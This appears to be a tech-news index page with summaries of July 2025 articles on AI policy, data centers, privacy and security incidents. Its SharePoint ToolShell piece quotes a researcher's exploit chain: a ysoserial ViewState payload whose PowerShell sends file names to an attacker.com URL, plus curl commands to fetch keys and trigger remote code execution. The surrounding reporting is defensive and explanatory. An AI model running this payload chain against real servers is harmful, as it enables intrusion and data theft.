Biz & IT – Page 6

White House unveils sweeping plan to “win” global AI race through deregulation

AI, AI and work, AI development tools, AI ethics, AI infrastructure, AI law, AI regulation, AI research, AI security, biosecurity, Biz & IT, china, Chips Act, data centers, David Sacks, Deepfakes, Department of Commerce, Donald Trump, Energy, Export controls, machine learning, Michael Kratsios, national security, NIST, Open Source, Policy, semiconductors, White House / 9u50fv / July 24, 2025

Trump’s plan was not welcomed by everyone. J.B. Branch, Big Tech accountability advocate for Public Citizen, in a statement provided to Ars, criticized Trump as giving “sweetheart deals” to tech companies that would cause “electricity bills to rise to subsidize discounted power for massive AI data centers.”

Infrastructure demands and energy requirements

Trump’s new AI plan tackles infrastructure head-on, stating that “AI is the first digital service in modern life that challenges America to build vastly greater energy generation than we have today.” To meet this demand, it proposes streamlining environmental permitting for data centers through new National Environmental Policy Act (NEPA) exemptions, making federal lands available for construction and modernizing the power grid—all while explicitly rejecting “radical climate dogma and bureaucratic red tape.”

The document embraces what it calls a “Build, Baby, Build!” approach—echoing a Trump campaign slogan—and promises to restore semiconductor manufacturing through the CHIPS Program Office, though stripped of “extraneous policy requirements.”

On the technology front, the plan directs Commerce to revise NIST’s AI Risk Management Framework to “eliminate references to misinformation, Diversity, Equity, and Inclusion, and climate change.” Federal procurement would favor AI developers whose systems are “objective and free from top-down ideological bias.” The document strongly backs open source AI models and calls for exporting American AI technology to allies while blocking administration-labeled adversaries like China.

Security proposals include high-security military data centers and warnings that advanced AI systems “may pose novel national security risks” in cyberattacks and weapons development.

Critics respond with “People’s AI Action Plan”

Before the White House unveiled its plan, more than 90 organizations launched a competing “People’s AI Action Plan” on Tuesday, characterizing the Trump administration’s approach as “a massive handout to the tech industry” that prioritizes corporate interests over public welfare. The coalition includes labor unions, environmental justice groups, and consumer protection nonprofits.

White House unveils sweeping plan to “win” global AI race through deregulation Read More »

OpenAI and partners are building a massive AI data center in Texas

AI, AI chips, AI GPU, AI infrastructure, Biz & IT, datacenters, Larry Ellison, machine learning, microsoft, NVIDIA, openai, oracle, sam altman, SoftBank, Stargate / 9u50fv / July 24, 2025

Stargate moves forward despite early skepticism

When OpenAI announced Stargate in January, critics questioned whether the company could deliver on its ambitious $500 billion funding promise. Trump ally and frequent Altman foe Elon Musk wrote on X that “They don’t actually have the money,” claiming that “SoftBank has well under $10B secured.”

Tech writer and frequent OpenAI critic Ed Zitron raised concerns about OpenAI’s financial position, noting the company’s $5 billion in losses in 2024. “This company loses $5bn+ a year! So what, they raise $19bn for Stargate, then what, another $10bn just to be able to survive?” Zitron wrote on Bluesky at the time.

Six months later, OpenAI’s Abilene data center has moved from construction to partial operation. Oracle began delivering Nvidia GB200 racks to the facility last month, and OpenAI reports it has started running early training and inference workloads to support what it calls “next-generation frontier research.”

Despite the White House announcement with President Trump in January, the Stargate concept dates back to March 2024, when Microsoft and OpenAI partnered on a $100 billion supercomputer as part of a five-phase plan. Over time, the plan evolved into its current form as a partnership with Oracle, SoftBank, and CoreWeave.

“Stargate is an ambitious undertaking designed to meet the historic opportunity in front of us,” writes OpenAI in the press release announcing the latest deal. “That opportunity is now coming to life through strong support from partners, governments, and investors worldwide—including important leadership from the White House, which has recognized the critical role AI infrastructure will play in driving innovation, economic growth, and national competitiveness.”

OpenAI and partners are building a massive AI data center in Texas Read More »

What to know about ToolShell, the SharePoint threat under mass exploitation

Biz & IT, exploits, Security, SharePoint, toolshell, vulnerabilities / Mike M. / July 24, 2025

Microsoft fixed the vulnerability pair—CVE-2025-49706 and CVE-2025-49704—two weeks ago as part of the company’s monthly update release. As the world learned over the weekend, the patches were incomplete, a lapse that opened organizations around the world to the new attacks.

Q: What sorts of malicious things are attackers doing with these newer ToolShell exploits?

A: According to numerous technical analyses, the attackers first infect vulnerable systems with a webshell-based backdoor that gains access to some of the most sensitive parts of a SharePoint Server. From there, the webshell extracts tokens and other credentials that allow the attackers to gain administrative privileges, even when systems are protected by multifactor authentication and single sign-on. Once inside, the attackers exfiltrate sensitive data and deploy additional backdoors that provide persistent access for future use.

For those who want more technical details, the opening volley in the attack is POST Web requests the attackers send to the ToolPane endpoint. The requests look like this:

Microsoft said these requests upload a malicious script named spinstall0.aspx, or alternatively spinstall.aspx, spinstall1.aspx, spinstall2.aspx, and so on. The script contains commands for retrieving a SharePoint server’s encrypted MachineKey configuration and returning the decrypted results to the attacker through a GET request.

Q: I maintain an on-premises SharePoint server. What should I do?

A: In short, drop whatever else you were doing and take time to carefully inspect your system. The first thing to look for is whether it has received the emergency patches Microsoft released Saturday. Install the patch immediately if it hasn’t already been done.

Patching the vulnerability is only the first step, since systems infected through the vulnerability show few or no signs of compromise. The next step is to pore through system event logs in search of indicators of compromise. These indicators can be found in numerous write-ups, including those from Microsoft and Eye Security (at the links above), the US Cybersecurity and Information Security Agency, and security firms Sentinel One, Akamai, Tenable, and Palo Alto Networks.

What to know about ToolShell, the SharePoint threat under mass exploitation Read More »

A power utility is reporting suspected pot growers to cops. EFF says that’s illegal.

Biz & IT, electric utilities, law enforcement, Policy, privacy, Security, smartmeters / Mike M. / July 23, 2025

In May 2020, Sacramento, California, resident Alfonso Nguyen was alarmed to find two Sacramento County Sheriff’s deputies at his door, accusing him of illegally growing cannabis and demanding entry into his home. When Nguyen refused the search and denied the allegation, one deputy allegedly called him a liar and threatened to arrest him.

That same year, deputies from the same department, with their guns drawn and bullhorns and sirens sounding, fanned out around the home of Brian Decker, another Sacramento resident. The officers forced Decker to walk backward out of his home in only his underwear around 7 am while his neighbors watched. The deputies said that he, too, was under suspicion of illegally growing cannabis.

Invasion of the privacy snatchers

According to a motion the Electronic Frontier Foundation filed in Sacramento Superior Court last week, Nguyen and Decker are only two of more than 33,000 Sacramento-area people who have been flagged to the sheriff’s department by the Sacramento Municipal Utility District, the electricity provider for the region. SMUD called the customers out for using what it and department investigators said were suspiciously high amounts of electricity indicative of illegal cannabis farming.

The EFF, citing investigator and SMUD records, said the utility unilaterally analyzes customers’ electricity usage in “painstakingly” detailed increments of every 15 minutes. When analysts identify patterns they deem likely signs of illegal grows, they notify sheriff’s investigators. The EFF said the practice violates privacy protections guaranteed by the federal and California governments and is seeking a court order barring the warrantless disclosures.

“SMUD’s disclosures invade the privacy of customers’ homes,” EFF attorneys wrote in a court document in support of last week’s motion. “The whole exercise is the digital equivalent of a door-to-door search of an entire city. The home lies at the ‘core’ of constitutional privacy protection.”

Contrary to SMUD and sheriff’s investigator claims that the likely illegal grows are accurate, the EFF cited multiple examples where they have been wrong. In Decker’s case, for instance, SMUD analysts allegedly told investigators his electricity usage indicated that “4 to 5 grow lights are being used [at his home] from 7pm to 7am.” In actuality, the EFF said, someone in the home was mining cryptocurrency. Nguyen’s electricity consumption was the result of a spinal injury that requires him to use an electric wheelchair and special HVAC equipment to maintain his body temperature.

A power utility is reporting suspected pot growers to cops. EFF says that’s illegal. Read More »

SharePoint vulnerability with 9.8 severity rating under exploit across globe

Biz & IT, Security, SharePoint, vulnerability, webshells / DJ Henderson / July 22, 2025

The researchers wrote:

Now, with the ToolShell chain (CVE-2025-49706 + CVE-2025-49704), attackers appear to extract the ValidationKey directly from memory or configuration. Once this cryptographic material is leaked, the attacker can craft fully valid, signed __VIEWSTATE payloads using a tool called ysoserial as shown in the example below.

Using ysoserial the attacker can generate it’s own valid SharePoint tokens for RCE.
# command to get the  via any public available SharePoint page, like start.aspx  curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="K[^"]+'  # example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir  ysoserial.exe -p ViewState -g TypeConfuseDelegate   -c "powershell -nop -c "dir 'C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions15TEMPLATELAYOUTS' | %  Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) ""   --generator=""   --validationkey=""   --validationalg=""   --islegacy   --minify  # finally, by adding the generated token to any request, the command is executed (RCE)  curl http://target/_layouts/15/success.aspx?__VIEWSTATE=
These payloads can embed any malicious commands and are accepted by the server as trusted input, completing the RCE chain without requiring credentials. This mirrors the design weakness exploited in 2021, but now packaged into a modern zero-day chain with automatic shell drop, full persistence, and zero authentication.

Patching is only the start

The attackers are using the capability to steal SharePoint ASP.NET machine keys, which allow the attackers to stage hacks of additional infrastructure at a later time. That means that patching alone provides no assurance that attackers have been driven out of a compromised system. Instead, affected organizations must rotate SharePoint ASP.NET machine keys and restart the IIS web server running on top.

According to The Washington Post, at least two federal agencies have found that servers inside their networks were breached in the ongoing attacks.

The Eye Security post provides technical indicators that admins can use to determine if their systems have been targeted in the attacks. It also provides a variety of measures vulnerable organizations can take to harden their systems against the activity.

In a post on Sunday, the US Cybersecurity and Infrastructure Security Agency confirmed the attacks and their use of ToolShell. The post went on to provide its own list of security measures.

SharePoint vulnerability with 9.8 severity rating under exploit across globe Read More »

$openai-jumps-gun-on-international-math-olympiad-gold-medal-announcement$

OpenAI jumps gun on International Math Olympiad gold medal announcement

AI, AI benchmarks, AI research, Alex Wei, Biz & IT, Google, GPT-4, GPT-5, International Mathematical Olympiad, large language models, machine learning, mathematical reasoning, Noam Brown, openai, proof systems, reasoning research, Sheryl Hsu, simulated reasoning, SR models / Kelly Newman / July 21, 2025

The early announcement has prompted Google DeepMind, which had prepared its own IMO results for the agreed-upon date, to move up its own IMO-related announcement to later today. Harmonic plans to share its results as originally scheduled on July 28.

In response to the controversy, OpenAI research scientist Noam Brown posted on X, “We weren’t in touch with IMO. I spoke with one organizer before the post to let him know. He requested we wait until after the closing ceremony ends to respect the kids, and we did.”

However, an IMO coordinator told X user Mikhail Samin that OpenAI actually announced before the closing ceremony, contradicting Brown’s claim. The coordinator called OpenAI’s actions “rude and inappropriate,” noting that OpenAI “wasn’t one of the AI companies that cooperated with the IMO on testing their models.”

Hard math since 1959

The International Mathematical Olympiad, which has been running since 1959, represents one of the most challenging tests of mathematical reasoning. More than 100 countries send six participants each, with contestants facing six proof-based problems across two 4.5-hour sessions. The problems typically require deep mathematical insight and creativity rather than raw computational power. You can see the exact problems in the 2025 Olympiad posted online.

For example, problem one asks students to imagine a triangular grid of dots (like a triangular pegboard) and figure out how to cover all the dots using exactly n straight lines. The twist is that some lines are called “sunny”—these are the lines that don’t run horizontally, vertically, or diagonally at a 45º angle. The challenge is to prove that no matter how big your triangle is, you can only ever create patterns with exactly 0, 1, or 3 sunny lines—never 2, never 4, never any other number.

The timing of the OpenAI results surprised some prediction markets, which had assigned around an 18 percent probability to any AI system winning IMO gold by 2025. However, depending on what Google says this afternoon (and what others like Harmonic may release on July 28), OpenAI may not be the only AI company to have achieved these unexpected results.

OpenAI jumps gun on International Math Olympiad gold medal announcement Read More »

Exhausted man defeats AI model in world coding championship

AI, AI coding, AI development tools, AtCoder, Biz & IT, competitive programming, large language models, machine learning, openai, Optimization, Programming, Przemysław Dębiak / Mike M. / July 19, 2025

While Dębiak won 500,000 yen and survived his ordeal better than the legendary steel driver, the AtCoder World Tour Finals pushes humans and AI models to their limits through complex optimization challenges that have no perfect solution—only incrementally better ones.

Coding marathon tests human endurance against AI efficiency

The AtCoder World Tour Finals represents one of competitive programming’s most exclusive events, inviting only the top 12 programmers worldwide based on their performance throughout the previous year. The Heuristic division focuses on “NP-hard” optimization problems. In programming, heuristics are problem-solving techniques that find good-enough solutions through shortcuts and educated guesses when perfect answers would take too long to calculate.

All competitors, including OpenAI, were limited to identical hardware provided by AtCoder, ensuring a level playing field between human and AI contestants. According to the contest rules, participants could use any programming language available on AtCoder, with no penalty for resubmission but a mandatory five-minute wait between submissions.

Leaderboard results for the 2025 AtCoder World Finals Heuristic Contest, showing Dębiak (as — Final leaderboard results for the 2025 AtCoder World Finals Heuristic Contest, showing Dębiak (as “Psyho”) on top. Credit: AtCoder

The final contest results showed Psyho finishing with a score of 1,812,272,558,909 points, while OpenAI’s model (listed as “OpenAIAHC”) scored 1,654,675,725,406 points—a margin of roughly 9.5 percent. OpenAI’s artificial entrant, a custom simulated reasoning model similar to o3, placed second overall, ahead of 10 other human programmers who had qualified through year-long rankings.

OpenAI characterized the second-place finish as a milestone for AI models in competitive programming. “Models like o3 rank among the top-100 in coding/math contests, but as far as we know, this is the first top-3 placement in a premier coding/math contest,” a company spokesperson said in an email to Ars Technica. “Events like AtCoder give us a way to test how well our models can reason strategically, plan over long time horizons, and improve solutions through trial and error—just like a human would.”

Exhausted man defeats AI model in world coding championship Read More »

Phishers have found a way to downgrade—not bypass—FIDO MFA

Biz & IT, fido alliance, passkeys, phishing, Security / Shannon Garcia / July 19, 2025

Researchers recently reported encountering a phishing attack in the wild that bypasses a multifactor authentication scheme based on FIDO (Fast Identity Online), the industry-wide standard being adopted by thousands of sites and enterprises.

If true, the attack, reported in a blog post Thursday by security firm Expel, would be huge news, since FIDO is widely regarded as being immune to credential phishing attacks. After analyzing the Expel write-up, I’m confident that the attack doesn’t bypass FIDO protections, at least not in the sense that the word “bypass” is commonly used in security circles. Rather, the attack downgrades the MFA process to a weaker, non-FIDO-based process. As such, the attack is better described as a FIDO downgrade attack. More about that shortly. For now, let’s describe what Expel researchers reported.

Abusing cross-device sign-ins

Expel said the “novel attack technique” begins with an email that links to a fake login page from Okta, a widely used authentication provider. It prompts visitors to enter their valid user name and password. People who take the bait have now helped the attack group, which Expel said is named PoisonSeed, clear the first big hurdle in gaining unauthorized access to the Okta account.

The FIDO spec was designed to mitigate precisely these sorts of scenarios by requiring users to provide an additional factor of authentication in the form of a security key, which can be a passkey, or physical security key such as a smartphone or dedicated device such as a Yubikey. For this additional step, the passkey must use a unique cryptographic key embedded into the device to sign a challenge that the site (Okta, in this case) sends to the browser logging in.

One of the ways a user can provide this additional factor is by using a cross-device sign-in feature. In the event there is no passkey on the device being used to log in, a user can use a passkey for that site that’s already resident on a different device, which in most cases will be a phone. In these cases, the site being logged into will display a QR code. The user then scans the QR code with the phone, and the normal FIDO MFA process proceeds as normal.

Phishers have found a way to downgrade—not bypass—FIDO MFA Read More »

GitHub abused to distribute payloads on behalf of malware-as-a-service

Biz & IT, GitHub, malware, Security / DJ Henderson / July 19, 2025

Researchers from Cisco’s Talos security team have uncovered a malware-as-a-service operator that used public GitHub accounts as a channel for distributing an assortment of malicious software to targets.

The use of GitHub gave the malware-as-a-service (MaaS) a reliable and easy-to-use platform that’s greenlit in many enterprise networks that rely on the code repository for the software they develop. GitHub removed the three accounts that hosted the malicious payloads shortly after being notified by Talos.

“In addition to being an easy means of file hosting, downloading files from a GitHub repository may bypass Web filtering that is not configured to block the GitHub domain,” Talos researchers Chris Neal and Craig Jackson wrote Thursday. “While some organizations can block GitHub in their environment to curb the use of open-source offensive tooling and other malware, many organizations with software development teams require GitHub access in some capacity. In these environments, a malicious GitHub download may be difficult to differentiate from regular web traffic.”

Emmenhtal, meet Amadey

The campaign, which Talos said had been ongoing since February, used a previously known malware loader tracked under names including Emmenhtal and PeakLight. Researchers from security firm Palo Alto Networks and Ukraine’s major state cyber agency SSSCIP had already documented the use of Emmenhtal in a separate campaign that embedded the loader into malicious emails to distribute malware to Ukrainian entities. Talos found the same Emmenhtal variant in the MaaS operation, only this time the loader was distributed through GitHub.

The campaign using GitHub was different from one targeting Ukrainian entities in another key way. Whereas the final payload in the one targeting the Ukrainian entities was a malicious backdoor known as SmokeLoader, the GitHub one installed Amadey, a separate malware platform known. Amadey was first seen in 2018 and was initially used to assemble botnets. Talos said the primary function of Amadey is to collect system information from infected devices and download a set of secondary payloads that are customized to their individual characteristics, based on the specific purpose in different campaigns.

GitHub abused to distribute payloads on behalf of malware-as-a-service Read More »

More VMware cloud partners axed as Broadcom launches new invite-only program

Biz & IT, Broadcom, vmware / Mike M. / July 17, 2025

In response to the white label program ending, a Reddit user who claimed that their organization spent 300,000 pounds (about $402,500) a year on licensing through a VMware white-label partner, said:

I now have 6 months to design / procure / build a new multi region service provider virtualisation platform to support millions in revenue and an additional 12 months to migrate all our VMware clients.

I’m just astonished.

In a statement to The Register, Broadcom encouraged CSPs cut from VMware’s channel to work with authorized partners to “ensure a smooth transition for customers who seek to renew a service at the end of their current term,” but it offered no incentive or resources.

“Stronger execution”

News of additional partner cuts follows last month’s debut of VMware Cloud Foundation (VCF) 9.0. The blog post by VMware partner Interactive posited that Broadcom is paring down its CSP partner program in relation to VCF 9.0, which it said “underpins a small number [of] hyperscale private cloud platforms in each region.”

In a statement to The Register explaining the changes, Broadcom said:

Broadcom’s strategy since closing the VMware acquisition has been to drive simplification, consistency, and innovation across the VMware Go To Market ecosystem, including VMware Cloud Service Providers (VCSPs).

Recent changes to this ecosystem are consistent with this strategy. Broadcom is focusing more and going deeper with the VCSPs who have demonstrated commitment to their cloud services built on VMware. This will enable us to deliver greater value, stronger execution, and a more streamlined experience for Broadcom’s VMware customers of all sizes and enable a truly competitive offering to the hyperscalers through our CSPs.

Broadcom hasn’t shared how many partners it has shed through previous VMware channel changes. Last month, it cut members of the VMware reseller program’s lowest tier and claimed that most affected partners were inactive.

When Broadcom dropped those resellers last month, there was concern that its partner reductions were too extreme. At the time, Gartner VP analyst Michael Warrilow, for example, told The Register: “Broadcom seem intent on destroying what was one of the most successful partner ecosystems in the industry.” Sumit Bhatia, co-author of the book Navigating VMware Turmoil in the Broadcom Era, told Ars Technica that he expected the partner cuts to result in higher pricing for VMware customers.

As Broadcom continues to whittle away at VMware’s remaining partner base, the impacts of a smaller partner program will become harder to ignore, particularly for small-to-medium-sized businesses. The change aligns with the perception that Broadcom is mostly interested in conducting VMware business with large customers, despite repeated claims that its VMware changes benefit “customers of all sizes.”

More VMware cloud partners axed as Broadcom launches new invite-only program Read More »

Google finds custom backdoor being installed on SonicWall network devices

Biz & IT, hackers, Security, sonicwall, vulnerabilities / Mike M. / July 17, 2025

Researchers from the Google Threat Intelligence Group said that hackers are compromising SonicWall Secure Mobile Access (SMA) appliances, which sit at the edge of enterprise networks and manage and secure access by mobile devices.

The targeted devices are end of life, meaning they no longer receive regular updates for stability and security. Despite the status, many organizations continue to rely on them. That has left them prime targets by UNC6148, the name Google has given to the unknown hacking group.

“GTIG recommends that all organizations with SMA appliances perform analysis to determine if they have been compromised,” a report published Wednesday said, using the abbreviation for Google Threat Intelligence Group. “Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities. Organizations may need to engage with SonicWall to capture disk images from physical appliances.”

Lacking specifics

Many key details remain unknown. For one thing, the attacks are exploiting leaked local administrator credentials on the targeted devices, and so far, no one knows how the credentials were obtained. It’s also not known what vulnerabilities UNC6148 is exploiting. It’s also unclear precisely what the attackers are doing after they take control of a device.

The lack of details is largely the result of the functioning on Overstep, the name of custom backdoor malware UNC6148 is installing after initial compromise of the devices. Overstep allows the attackers to selectively remove log entries, a technique that is hindering forensic investigation. Wednesday’s report also posits that the attackers may be armed with a zero-day exploit, meaning it targets a vulnerability that’s currently publicly unknown. Possible vulnerabilities UNC6148 may be exploiting include:

CVE-2021-20038: An unauthenticated remote code execution made possible by a memory corruption vulnerability.
CVE-2024-38475: An unauthenticated path traversal vulnerability in Apache HTTP Server, which is present in the SMA 100. It can be exploited to extract two separate SQLite databases that store user account credentials, session tokens, and seed values for generating one-time passwords.
CVE-2021-20035: An authenticated remote code execution vulnerability. Security firm Arctic Wolf and SonicWall reported in April that this vulnerability was under active exploitation.
CVE-2021-20039: An authenticated remote code execution vulnerability. There have been reports that this vulnerability was under active exploitation to install ransomware in 2024.
CVE-2025-32819: An authenticated file deletion vulnerability that can be exploited to cause a targeted device to revert the built-in administrator credentials to a password so that attackers can gain administrator access.

Google finds custom backdoor being installed on SonicWall network devices Read More »

Hackers exploit a blind spot by hiding malware inside DNS records

Biz & IT, DNS, domain name system, malware, Security / 9u50fv / July 16, 2025

Hackers are stashing malware in a place that’s largely out of the reach of most defenses—inside domain name system (DNS) records that map domain names to their corresponding numerical IP addresses.

The practice allows malicious scripts and early-stage malware to fetch binary files without having to download them from suspicious sites or attach them to emails, where they frequently get quarantined by antivirus software. That’s because traffic for DNS lookups often goes largely unmonitored by many security tools. Whereas web and email traffic is often closely scrutinized, DNS traffic largely represents a blind spot for such defenses.

A strange and enchanting place

Researchers from DomainTools on Tuesday said they recently spotted the trick being used to host a malicious binary for Joke Screenmate, a strain of nuisance malware that interferes with normal and safe functions of a computer. The file was converted from binary format into hexadecimal, an encoding scheme that uses the digits 0 through 9 and the letters A through F to represent binary values in a compact combination of characters.

The hexadecimal representation was then broken up into hundreds of chunks. Each chunk was stashed inside the DNS record of a different subdomain of the domain whitetreecollective[.]com. Specifically, the chunks were placed inside the TXT record, a portion of a DNS record capable of storing any arbitrary text. TXT records are often used to prove ownership of a site when setting up services like Google Workspace.

An attacker who managed to get a toehold into a protected network could then retrieve each chunk using an innocuous-looking series of DNS requests, reassembling them, and then converting them back into binary format. The technique allows the malware to be retrieved through traffic that can be hard to closely monitor. As encrypted forms of IP lookups—known as DOH (DNS over HTTPS) and DOT (DNS over TLS)—gain adoption, the difficulty will likely grow.

Hackers exploit a blind spot by hiding malware inside DNS records Read More »